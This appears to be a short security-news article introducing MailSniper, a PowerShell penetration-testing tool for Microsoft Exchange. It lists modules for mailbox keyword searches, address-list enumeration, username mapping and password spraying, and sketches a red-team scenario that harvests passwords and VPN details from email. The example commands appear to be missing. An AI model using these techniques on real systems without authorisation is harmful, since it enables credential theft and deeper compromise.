MailSniper is a PowerShell-based penetration testing tool for Microsoft Exchange environments. It enables targeted or mass searches of mailboxes to uncover credentials, insider intelligence, and infrastructure details. Standard users can query their mailbox, while administrators with the **ApplicationImpersonation** role can run organisation-wide searches.

This complements darknet.org.uk’s coverage of offensive tooling by extending reconnaissance into the email layer, alongside previously covered post-exploitation frameworks like Nishang and password spraying tools such as TREVORspray.

Key Features

• Invoke-SelfSearch: Search the current user’s mailbox for defined keywords
• Invoke-GlobalMailSearch: Use impersonation to search all mailboxes
• Get-GlobalAddressList: Enumerate email addresses from the Global Address List
• Get-ADUsernameFromEWS: Map email addresses to Active Directory usernames
• Invoke-OpenInboxFinder: Identify accessible shared or group mailboxes
• Password spraying modules for OWA, EWS, and ActiveSync

Installation & Usage

Requirements: Windows with PowerShell and network access to Exchange.

Common usage examples:

Attack Scenario

In a red team engagement, a tester compromises an account with ApplicationImpersonation rights. Running:

The output reveals passwords, VPN details, and network diagrams sent over email. Coupled with GAL enumeration, the tester now has a user map and live credentials, enabling lateral movement and deeper compromise.

Conclusion

MailSniper brings a targeted, high-value capability to the red team arsenal, turning email systems into an intelligence goldmine. In engagements where Exchange is present, it bridges initial access and lateral movement by uncovering credentials and network insight that would otherwise remain hidden. Paired with password spraying and mailbox enumeration, it can rapidly expand an attacker’s foothold and operational scope.

You can read more or download MailSniper here: https://github.com/security-geeks/MailSniper